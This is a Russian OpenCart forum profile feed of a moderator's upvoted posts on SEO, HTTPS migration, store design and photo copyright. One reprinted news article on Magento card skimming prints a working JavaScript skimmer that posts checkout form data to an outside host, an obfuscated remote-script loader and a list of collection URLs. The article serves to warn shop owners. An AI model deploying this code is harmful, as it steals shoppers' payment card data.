COVID2019 и это вот все. Друзья, вся эта история начинает плохо пахнет. Мойте руки, не ходите в люди. Отложите все плановые покупки и положите в носок заначку. Заприте ваших родителей, бабушек-дедушек на даче. Лучше перебдеть чем недобдеть. Берегите себя!

Blondy

Администраторы
  • Публикации

    1565
  • Зарегистрирован

  • Посещение

  • Days Won

    63

Изменения репутации

  1. Upvote
    Blondy получил репутацию от StavEXpert в LandingPage на OpenCart?   
    Присоединяюсь, можно отлично делать подобие лендинга с помощью SEO CMS )) 
    Недавно подобную штуку делала заказчику. 
    Получилось нечто такое (еще не закончено, так как заказчик еще до конца не понял, чего хочет  ). Сделано, кажется, 2 или 3 правки в шаблоне, остальное модулем. 
     
  2. Upvote
    Blondy получил репутацию от ocfilter в Магазин пряжи и вышивки - metelica-hobby.ru   
    Относительно цветов, как-то розовый реально глаз ест.
     
    Вот тут посмотрите, может чего приглянется 
    http://color.romanuke.com/page/4/?color1=13&color2=10#038;color2=10
     
    http://color.romanuke.com/tsvetovaya-palitra-3029/
    http://color.romanuke.com/tsvetovaya-palitra-2926/
  3. Upvote
    Blondy получил репутацию от Ксения в Магазин пряжи и вышивки - metelica-hobby.ru   
    Может где-то убрать стоит? 

  4. Upvote
    Blondy получил репутацию от StavEXpert в Магазин пряжи и вышивки - metelica-hobby.ru   
    Относительно цветов, как-то розовый реально глаз ест.
     
    Вот тут посмотрите, может чего приглянется 
    http://color.romanuke.com/page/4/?color1=13&color2=10#038;color2=10
     
    http://color.romanuke.com/tsvetovaya-palitra-3029/
    http://color.romanuke.com/tsvetovaya-palitra-2926/
  5. Upvote
    Blondy получил репутацию от Виктори в Отключать или удалять отсутсвующие товары   
    Я не удаляю. 
    Переношу их в "архив" а в самих товарах добавляю рекомендуемые товары, которые есть в наличии. 
     
  6. Upvote
    Blondy изменил репутацию Celtik Frost в Поздравляем Йоду с победой на выборах президента США!   
    Дональд Трамп, в более узких кругах известный как магистр Йода, одержал победу на самых непредсказуемых президентских выборах в новейшей истории США.
    Президентская кампания сопровождалась многочисленными скандалами, Трампа уличали в троллинге, сквернословии и жестоком обращении с некоторыми представителями OC Team. Результат до последней минуты оставался неясным, фаворит президентской гонки был не очевиден, а кандидаты шли плечом к плечу.
    Тем не менее, по последним данным, республиканец Дональд Трамп получил 278 голосов, преодолев необходимый для победы барьер в 270 голосов.
    В штабе Трампа скандировали: "Opencart.pro, Opencart.pro, Opencart.pro", в стане сторонников Клинтон же царила подавленная атмосфера.
    С праздником, коллеги!
     
     
  7. Upvote
    Blondy получил репутацию от Ксения в Магазин пряжи и вышивки - metelica-hobby.ru   
    Относительно цветов, как-то розовый реально глаз ест.
     
    Вот тут посмотрите, может чего приглянется 
    http://color.romanuke.com/page/4/?color1=13&color2=10#038;color2=10
     
    http://color.romanuke.com/tsvetovaya-palitra-3029/
    http://color.romanuke.com/tsvetovaya-palitra-2926/
  8. Upvote
    Blondy получил репутацию от Виктори в Магазин пряжи и вышивки - metelica-hobby.ru   
    Относительно цветов, как-то розовый реально глаз ест.
     
    Вот тут посмотрите, может чего приглянется 
    http://color.romanuke.com/page/4/?color1=13&color2=10#038;color2=10
     
    http://color.romanuke.com/tsvetovaya-palitra-3029/
    http://color.romanuke.com/tsvetovaya-palitra-2926/
  9. Upvote
    Blondy получил репутацию от RHCk в Личная просьба о помощи!   
    Вы маякните, мы подтянемся. ) 
  10. Upvote
    Blondy изменил репутацию WarStyle в Полезные расширения для браузеров   
    Viewport Resizer посмотреть сайт в разных разрешениях
  11. Upvote
    Blondy изменил репутацию RHCk в Полезные расширения для браузеров   
    Всем привет!
     
    Часто вижу на скриншотах большое количество открытых вкладок в браузерах. Вот вам в помощь:
    OneTab для Chrome
    OneTab для Mozilla
    Закрывает все вкладки, и на одной собирает ссылки на закрытые вкладки.
     
    Ну и ещё немного:
    FireBug для Mozilla (MUST HAVE EVERYONE!)
    uBlock Origin (Требует более тонкой настройки, чем Adblock и AdBlockPlus. Иногда блокирует mail.ru)
    Browsec VPN (тут понятно, для параноиков)
    Random User-Agent (всё для них же)
    Ghostery (подсматривать за тем, кто подсматривает за вами)
    IETab (Посмотреть страничку как в IE)
    Turn Off the Lights (удобнее смотреть видео, если не на полный экран, затемняет фон)
  12. Upvote
    Blondy получил репутацию от RHCk в Приколы ))   
    Внимание, найден автор PAV шаблонов. Смотреть портфолио http://elcorrason.tk
  13. Upvote
    Blondy изменил репутацию Blade в Копирайт, быть или не быть, вот в чём вопрос   
    ты трезвый ?
    привет ему передавай
  14. Upvote
    Blondy получил репутацию от Виктори в Копирайт, быть или не быть, вот в чём вопрос   
    Как по мне, то лучше без инфы совсем, чем копипаст.

    Я обычно делаю поэтапно, сделала 50 товаров, загрузила на сайт и т.д.

    Ну, и люди для этого наемные есть, это не так дорого стоит ))

  15. Upvote
    Blondy изменил репутацию RHCk в Руководство для перехода на SSL (HTTPS)   
    ВАЖНО! ТЕМА ЗАКРЫТА. ОБНОВЛЕННАЯ ИНСТРУКЦИЯ ДЛЯ ПЕРЕХОДА НА HTTPS - >>>ЗДЕСЬ<<<
     
    Правила Темы:
     
    UPD24.10.2016 Данная инструкция актуальна для Opencart.PRO и Opencart.CMS версий 2.1.0.2.2 и выше!
    UPD02.11.2016 Важное дополнение по Ukraine.com.ua от @Yoda в Пункте 10.2
    UPD08.01.2017 Дополнение от @markimax в Пункте 3.4 о том, нужно ли удалять модуль HTTP FIX после склейки зеркал.
    UPD04.02.2017 Добавлен Раздел 12 - Дополнение для версий 1.5.X.
    UPD28.02.2017 Добавлена информация для настройки обмена по HTTPS с программами от 1С - ЗДЕСЬ.
    UPD16.03.2017 Обновлен список авторизационных (удостоверяющих) центров (CA).
    UPD07.03.2018 Яндекс заменит директиву HOST на 301-й редирект - больше информации ЗДЕСЬ.
     
     
    0. ВАЖНО! Перед началом любых экспериментов не забываем делать бэкап файлов и базы сайта!!!
     
    1. Для перехода на SSL (HTTPS) нужен сертификат, получить его можно здесь:
     
    2. Далее необходимо установить сертификат на сервер, либо активировать его в ПУ, либо передать его хостинг-провайдеру для установки на сервер (на котором размещен ваш сайт). Более подробно о данной процедуре можно узнать у техподдержки хостера.
     
    3. Настраиваем CMS для работы с SSL.
    3.1 В файлах /config.php и admin/config.php делаем замены:
    3.2 Устанавливаем этот модуль. Отдельно благодарим комрадов @Yoda, @savage4pro и @markimax, которыми он был написан.
    Настройка CMS на данном этапе завершена.
    3.3 Дополнительная информация от @savage4pro о работе модуля:
    3.4 Нужно ли удалять модуль после склейки зеркал?
     
    4.  Далее необходимо настроить редирект с HTTP на HTTPS.
    Ситуация здесь двоякая, если сразу настроить редирект, в большинстве случаев позиции в выдаче ПС будут потеряны. Явление временное, но неприятное.
    Посему, согласно изысканиям и рекомендациям комрадов @Yoda и @savage4pro (если о ком-то не написал, отпишитесь, исправлю), с редиректом мы повременим до момента склейки зеркал сайта поисковиками (зеркала - сайт на HTTP и на HTTPS).
    Делаем следующее в файле robots.txt:
    если sitemap вашего сайта не отдается фидом, добавляем в обе секции (User-agent: * и User-agent: Yandex) файла robots.txt следующие директивы:
    Sitemap: httрs://mysite.com/sitemap.xml в секции для Яндекса (User-agent: Yandex) добавляем директиву Host: Host: https://<ваш_сайт> если sitemap вашего сайта отдается фидом, отдаем ПСам новый фид (по HTTPS); добавляем новый сайт на HTTPS в Вебмастеры ПС; наблюдаем и ждём момента когда главным зеркалом станет сайт на HTTPS и произойдёт склейка зеркал. Вебмастеры ПС:
     
    5. Добавляем в Вебмастеры Яндекса и Гугла HTTPS-версии вашего сайта. В Вебмастере Яндекса наблюдаем и ждём момента, когда зеркала будут склеены. Для тех у кого не очень много товаров в каталоге или много свободного времени идём Инструменты -> Переобход страниц и каждый день добавляем по 10 ссылок (с HTTPS), тем самым заставляя Яшу чуть быстрее индексировать ваш сайт по HTTPS.
     
    6. Дополнительная информация:
    от Яши - здесь и здесь от Гоши - здесь и здесь.  
    7. Когда склейка зеркал произошла, остается дело за малым - настроить редирект.
    7.1 Идём "Система -> Настройки -> Редактировать -> Вкладка Сервер -> Использовать SSL: выбираем Да. ДО склейки зеркал НЕ включаем.
    7.2 И тут, на мой взгляд, основные танцы с бубном. Обновленный seo_pro (с версии 2.1.0.2.2) позволяет избавиться от танцев с бубном вокруг .htaccess, делая внесение изменений в него не обязательными.
     
    Написать о результатах и задать вопрос можно в теме поддержки модуля.
     
    Если вы всё же приняли решение настроить редирект в .htaccess, для вас информация далее.
    В виду того, что у разных хостинг-провайдеров разные настройки серверов, необходимо выбрать тот вариант редиректа, который будет работать. Как проверить напишу чуть ниже.
    Важный момент! Подразумевается, что редирект с "с www" на "без www", или наоборот, у вас уже настроен. Если нет, смотрите здесь.
    ВАЖНО! Изменения вносятся в файл .htaccess в корневом каталоге сайта.
    ВАЖНО! Редиректы в файле .htaccess необходимо добавлять сразу после строки с 'RewriteBase /'. Если не работает, попробуйте поставить выше, сразу после строки с  'RewriteEngine On'. О результатах экспериментов пишите в этой теме.
    7.3 Варианты редиректов:
    7.3.1 Редиректы от @Yoda:
    7.3.2 Редиректы от @savage4pro:
    7.3.3 Редирект от Timeweb.ru:
    7.3.4 Редирект для Ukraine.com.ua:
    7.3.5 Редирект для Masterhost.ru (говорим спасибо @Yoda здесь?
    7.3.6 Редирект для webhost1.ru:
    7.3.7 Редирект для связки nginx и Apache:
    7.3.8 Редирект для jino.ru от @markimax:
     
    8. Проверка. Чтобы проверить корректность работы произведенных изменений необходимо сделать следующее:
    8.1 Если у вас настроен редирект с "с www" на "без www"
    идём на сайт по HTTP с WWW, должны получить HTTPS без WWW; идём на сайт по HTTP без WWW, должны получить HTTPS без WWW; идём на сайт по HTTPS с WWW, должны получить HTTPS без WWW. 8.2 Если у вас настроен редирект с "без www" на "с www"
    идём на сайт по HTTP с WWW, должны получить HTTPS с WWW; идём на сайт по HTTP без WWW, должны получить HTTPS с WWW; идём на сайт по HTTPS без WWW, должны получить HTTPS с WWW. 8.3 Отдельно можно проверить как после всех изменений ваш сервер отдает статические файлы, например, фото товаров.
    Зайдите на страницу товара, скопируйте ссылку на фото товара, вставьте её в строку браузера и поэкспериментируйте согласно пунктам 8.1 - 8.2, и посмотрите по какому протоколу будет отдаваться статика. 
    8.4 У некоторых хостинг-провайдеров есть возможность включить редирект в ПУ. Тут следует обратить внимание на то, каким редиректом будет осуществляться переадресация - 301-м или 302-м. Нужен 301-й. Как посмотреть? Можно здесь. Также показывает редирект Screaming Frog SEO Spider, браузер тоже показывает. Пробуйте.
    8.5 Проверьте сайт на наличие ссылок по HTTP. Это могут быть ссылки в статьях или описаниях товаров. Необходимо изменить в них HTTP на HTTPS или сделать их относительными, т.е. без доменного имени сайта.
     
    9. ВАЖНО! Все внешние скрипты, стили, шрифты и прочие iframe должны подключаться строго по HTTPS и никак иначе! В противном случае получим кучу ошибок в консоли браузера и корявости на сайте. 
     
    10. Решения для хостинг-провайдеров:
    10.1 Хостинг-провайдер Timeweb.ru:
    10.2 Хостинг-провайдер Ukraine.com.ua:
     
    ПОЛЕЗНО! Сервис для тестирования установленного сертификата QUALYS SSL LABS
     
    11. Небольшой эксперимент с инструментом "Переобход страниц":
    11.1 Сайт, около 600 товаров, переставил на HTTPS.
    11.2 В вебмастере Яндекса сделал "переезд на https" получил ответ, что скоро всё произойдёт. До сих пор жду.
    11.3 Добавил отдельно тот же сайт, но по HTTPS, так "Переобход" работает.
    11.4 Добавляю каждый день по 10 страниц (без повторений) в "Переобход страниц".
    11.5 Результат (И - страниц в индексе, П - страниц в поиске):
    11.6 Вывод - профит от инструмента ясен и понятен.
    P.S. Ну а если вы всё ещё ждёте Яшу в гости, ну что ж ждите
     
    12. Переход на HTTPS для OC версий 1.5.X
    12.0 См. Пункт 0 настоящей Инструкции.
    12.1 Устанавливаем сертификат (Пункт 1 настоящей Инструкции). На shared хостингах в ПУ хостинга все редиректы должны быть выключены.
    12.2 В файлах /config.php и admin/config.php делаем замены:
    12.3 Делаем следующее в файле robots.txt:
    если sitemap вашего сайта не отдается фидом, добавляем в обе секции (User-agent: * и User-agent: Yandex) файла robots.txt следующие директивы:
    Sitemap: httрs://mysite.com/sitemap.xml в секции для Яндекса (User-agent: Yandex) добавляем директиву Host: Host: https://<ваш_сайт> если sitemap вашего сайта отдается фидом, отдаем ПСам новый фид (по HTTPS); добавляем новый сайт на HTTPS в Вебмастеры ПС; наблюдаем и ждём момента когда главным зеркалом станет сайт на HTTPS и произойдёт склейка зеркал. 12.4 В .htaccess добавляем один из редиректов (обращаем внимание на комментарии):
    Редирект ставим между директивами RewriteEngine On и RewriteBase /
    Первая строка и нижние строки добавлены для ориентира.
    12.5 Идём Система -> Настройки -> Нажать 'Изменить' -> Вкладка 'Сервер' -> Использовать SSL выбираем ДА.
    12.6 Производим проверку согласно Раздела 8 настоящей инструкции.
     
    P.S. На некоторых хостингах (из-за настроек серверов) не работают, либо работают некорректно, редиректы в .htaccess. Можно поэкспериментировать с редиректами из Пунктов 7.3.1 и 7.3.3 настоящей Инструкции, попытаться запросить правильный редирект у хостинг-провайдера, или включить редиректы в ПУ хостинга (предварительно откатив все изменения касающиеся редиректов в .htaccess).
  16. Upvote
    Blondy получил репутацию от NoOne! в Личная просьба о помощи!   
    Готово
  17. Upvote
    Blondy изменил репутацию NoOne! в Личная просьба о помощи!   
    Привет!
     
    Предыстория 
     
    Недавно мне пришло на почту уведомление что идет опять конкурс, я посмотрел,и понял что у меня есть ровно сутки....Короче беру свою девушку (почти жена),быстро забираю ее с Киева,и везу домой,даю короче свои гаджеты,ставлю свои вспышки для фото (ювелирку фоткаю) и поехали....Короче из 200 фоток,выбрали одну...Немного обработав ее,выложил на форум опять.
     
    Первая неделя пошла,я успел закинуть фото,и тут началось голосование посредством "Опроса" в Google Формах...Зарегать кучу акков не выйдет,т.к там привязка к телефону..Далее если ее отберут в финал,то через 3 недели будет та самая процедура в финале....Поэтому.
     
     
     
    Друзья,я прошу всех,кому не сложно,помочь в этом

    ГОЛОСОВАТЬ ТУТ!
    (Алина, г.Киев, она самая первая слева)
    (если что ,вот фото)
     
     
    Буду очень признателен!
     
  18. Upvote
    Blondy получил репутацию от RHCk в Кнопки соц. сетей (скромное пожелание)   
    Я пользуюсь. Кнопки как кнопки ) 
  19. Upvote
    Blondy получил репутацию от RHCk в Юридические вопросы с интернет-магазином   
    Во первых, фото действительно должны быть Вашими, во вторых на сайте должны быть прописаны правила использования информации в публичной оферте. Только после этого можно предъявлять претензии, в каком бы то виде.
     
    По практике могу рассказать несколько историй и ситуаций.
     
    Ситуация первая, когда есть некий специфический товар, и его фото есть только на сайте производителя. Но покупаем мы его не у производителя, а у дисти, и с производителем никаких отношений нету. Тут приходится брать с сайта, и так и вешать. Был у меня такой случай, когда звонил производитель, из-за рубежа, мол что это такое, откуда у вас наши фото и товар вообще? Мило пообщались, и даже предлагали работать напрямую. Поэтому, если Вы видите что Ваши фото Вашего товара где то на чужом сайте, подумайте, что они там делают. Позвоните, спросите. Правда, это работает только если Вы производитель, и товар эксклюзивный. Если это ширпотреб, который есть у всех, тут сложнее...
     
    Вторая ситуация - когда товар есть у всех, и производителю пофиг, кто и как продает. Да, все хотят по быстрому наполнить магазины. Да, сама недавно парсила 18 000 фотографий товара с разных сайтов что бы наполнить очередной магазин. Просто потому что другого выхода нет, снять все самой нереально, потому как для этого надо все 18 000 товара купить для начала. Тут никто не будет предъявлять права на фото, все так делают, такова специфика именно этого рынка. Но есть проблема индексации поисковиками, и что бы для них картинки были уникальными, приходится над ними шаманить.
     
    Третья ситуация - когда товар есть у всех, но фото нет, и каждый магазин пытается снимать самостоятельно, а другие магазины у него воруют фото. Самая сложная ситуация. Тут или что то делать заранее или забить совсем. Можно накладывать вотемарки или снимать на фирменном фоне, как Вы делаете, знаю случаи когда один товарищ в некоторые фото закладывал бэкдор, и если находил их где то, то сносил весь сайт. Злобно, да, согласна. Так делать не стоит.
     
    Но если уж решили с этим бороться, то в первую очередь позаботьтесь о авторстве, и о публичной оферте на своем сайте. Если обнаружили фото где то - не поленитесь просто позвонить и познакомиться с конкурентами. Во первых они сразу поймут что за ними наблюдают, во вторых можете сразу договориться нормально, если люди адекватные. Вплоть до того что они купят у вас качественные фото или сосватаете им своего фотографа. Тогда все заработают и все будет гуд. Если же нет, начинают быковать, то оценивайте соотношение затрат на фото, стоимость адвоката, и желанием наказать конкурентов. А так же возможности мести с их стороны, начиная от черных подлянок по SEO, черному PR и заканчивая DDOS, если у вас действительно крупный магазин.
     
    Если все же решили судиться, то позаботьтесь о доказательной базе. Нужно зафиксировать факт что фото ваши, и что они же расположены на другом сайте. Это может сделать нотариус, хотя не сталкивалась с такой практикой в Украине, никогда дело не доходило до этого, обычно все решалось мирно. А вот в России широко распространена практика юридической фиксации интернет-контента, и можно доказать что эти фото использовались, и использовались с коммерческой выгодой, даже если на момент суда конкуренты все подчистили у себя на сайте.
  20. Upvote
    Blondy изменил репутацию markimax в Magento и JS-скиммеры   
    Magento спалился
     
    https://www.magereport.com/
     
    Github удалил список 5925 интернет-магазинов с установленными JS-скиммерами


    Онлайн-скимминг — относительно новая форма мошенничества с банковскими картами. Суть понятна из названия. Если обычный скиммер представляет собой накладку на картоприёмник ATM, который делает дамп магнитной полосы, то онлайн-скиммер — это программная закладка на сервере интернет-магазина, которая пассивно перехватывает платёжные данные во время их ввода пользователем в текстовые поля в браузере. До настоящего времени кардеры концентрировались преимущественно на серверах транзакций, где применяется шифрование, но в этом случае информация снимается ещё до шифрования. Затем информация о платёжных картах продаётся на подпольных форумах: обычно по этим картам постороннее лицо может без проблем осуществить платежи.

    Специалисты по безопасности из Nightly Secure говорят, что онлайн-скимминг быстро набирает популярность в последнее время. Впервые о распространении такого мошенничества заговорили в 2015 году. На ноябрь 2015 года из списка 255 000 интернет-магазинов был обнаружен 3501 магазин с JS-закладками на сервере. За год их количество выросло на 69%.

    Образец javascript-закладки для перехвата платёжных данных выглядит так (в данном случае информация отправляется на http://ownsafety.org/opp.php):
      <script>// <![CDATA[ // whitespace added for readability --wdg function j(e) { var t = "; " + document.cookie, o = t.split("; " + e + "="); return 2 == o.length ? o.pop().split(";").shift() : void 0 } j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) { e("button").on("click", function() { var t = "", o = "post", n = window.location; if (new RegExp("onepage|checkout").test(n)) { for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) { var a = c[i].name; "" == a && (a = i), t += a + "=" + c[i].value + "&" } if (t) { var l = new RegExp("[0-9]{13,16}"), u = new XMLHttpRequest; u.open(o, e(" <div />").html("http://ownsafety.org/opp.php").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear() } } }) }); // ]]></script>
    В прошлом году исследователи составили список наиболее часто используемых адресов для сбора данных:
      1860 https://ownsafety.org/opp.php 390 http://ownsafety.org/opp.php 309 https://useagleslogistics.com/gates/jquery.php 100 https://redwiggler.org/wp-content/themes/jquerys.php 70 https://clickvisits.biz/xrc.php 28 https://gamula.eu/jquery.php 23 https://gamula.ru/order.php 22 https://news-daily.me/gt/ 20 https://antaras.xyz/jquery.php 17 https://clicksale.xyz/xrc.php 10 https://ausfunken.com/service/css.php 9 http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php 5 https://redwiggler.org/wp-content/themes/jquery.php 1 /js/index.php 1 /js/am/extensions/sitemap_api.php 1 https://infopromo.biz/lib/jquery.php 1 https://google-adwords-website.biz/gates/jquery.php 1 https://bandagesplus.com/order.php 1 http://nearart.com/order.php 1 http://happysocks.in/jquery.pl
    Практически во всех случаях используются небольшие варианты одного и того же кода.

    Подобную закладку довольно трудно обнаружить на сервере. Код загружается из CMS и работает в браузере. На упомянутых трёх с половиной тысячах сайтов в прошлом году она работала по несколько месяцев, на многих — полгода и больше.

    Специалисты считают, что большое количество заражённых серверов указывает на высокую степень автоматизации атаки. Этим занимаются не какие-то скрипт-кидди, а хорошие профессионалы. Вероятно — из России.

    Для внедрения закладок используются уязвимости в программном обеспечении интернет-магазинов. В первую очередь, это уязвимое программное обеспечение Magento Commerce. Именно через него проще всего внедрить код CMS, хотя на самом деле этот код может работать в любом интернет-магазине, не обязательно использующем Magento. Проверить интернет-магазин на наличие уязвимостей можно на сайте MageReports.com.

    Хотя проблему подняли год назад, но за прошедший год она никуда не исчезла. Хуже того, заражённых интернет-магазинов стало в полтора раза больше. В марте 2016 года количество магазинов со скиммерами выросло с 3501 до 4476, а в сентябре 2016 года — до 5925.

    Ребята из Nightly Secure опубликовали список всех заражённых магазинов, чтобы предупредить покупателей — и уведомить администраторов этих магазинов об уязвимости. Ведь среди них были довольно популярные сайты, в том числе отделения автопроизводителей (Audi ZA), правительственные организации (NRSC, Малайзия), сайты популярных музыкантов (Бьорк), и некоммерческие орагнизации (Science Museum, Washington Cathedral).

    Если год назад практически во всех магазинах использовались небольшие модификации одного и того же онлайн-скиммера, то сейчас исследователи нашли уже 9 отдельных разновидностей скрипта, принадлежащих 3 разным семействам (образцы код на Github).

    Злоумышленники поумнели и сейчас используют многоуровневую обфускацию кода, которую не так просто разобрать. Например, скрипт может маскироваться вот так:



    Реальный код зловреда:
      <script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');//4079</script>
    Авторы также усовершенствовали механизм перехвата данных платёжных карточек. Если раньше зловред просто перехватывал страницы со строкой checkout в URL, то теперь он уже распознаёт популярные платёжные плагины Firecheckout, Onestepcheckout и Paypal.

    Специалисты из Nightly Secure попыталсь связаться с рядом магазинов (около 30) и сообщить им об установленном скиммере, но от большинства магазинов не получили ответа, а другие проявили удивительную беспечность. Один сказал, что это не его проблема, потому что платежи обрабатывает сторонняя компания. Второй сказал, что это просто ошибка Javascript, не представляющая угрозы. Третий вовсе сказал, что никакой опасности не может быть, потому что «магазин работает по HTTPS». Автор передал список магазинов со скиммерами в Google для помещения в чёрный список Chrome Safe Browsing.

    Список всех магазинов со скиммерами был первоначально опубликован на Githab. И вот тут началось самое интересное. Вскоре Github без предупреждения удалил со своего сайта публикацию результатов исследования онлайн-магазинов.

    Судя по всему, Github осуществил цензуру по стандартной процедуре, получив DMCA-запрос от одного из магазинов. Конечно, магазину неприятно, когда у него находят уязвимость и рассказывают всему миру.

    Вчера автор переместил результаты исследования безопасности интернет-магазинов на хостинг Gitlab. Сегодня страница по этому адресу возвращает ошибку 404. Несколько часов назад автор получил письмо от Gitlab, в котором объясняют причины удаления. По мнению администрации, публикация списка уязвимых магазинов рассматривается как «вопиющий случай», который не может быть разрешён. Поэтому список был удалён.

    Копия списка в веб-архиве
    Копия на Pastebin

    Заметим, что в списке магазинов с установленными онлайн-скиммерами перечислены 44 домена в зоне .RU.

    Будем надеяться, что администраторы этих магазинов оперативно установят версию Magento с последними патчами и компенсируют убытки покупателям, у которых копии платёжных карточек утекли на чёрный рынок.
  21. Upvote
    Blondy получил репутацию от WarStyle в GENTLE - шаблон для OpenCart 2.X   
    редирект с www и без настройте, это не проблема шаблона. А вообще нужно давать ссылку )
  22. Upvote
    Blondy изменил репутацию RHCk в GENTLE - шаблон для OpenCart 2.X   
    Не нравится? Закачайте обратно
  23. Downvote
    Blondy изменил репутацию intelcore1 в Обновление сайта c 2.0.3.1 на оперкарт.про   
    А потом придет блондинка и будет оффтопить в чужих темах.
    Вижу, что культура сетевого общения и модерирования форумов прошла мимо тебя.
    Кыш из этой темы и не забудь потереть свой флуд.
  24. Upvote
    Blondy изменил репутацию NoOne! в Обновление сайта c 2.0.3.1 на оперкарт.про   
    Неееет,главное бэкап,а остальное дело времени )
     
    Мудак мудаку рознь
  25. Upvote
    Blondy изменил репутацию Влад в Покупка opencart.pro   
    ocmod лучше vqmod, понять это невозможно, поэтому просто запомни )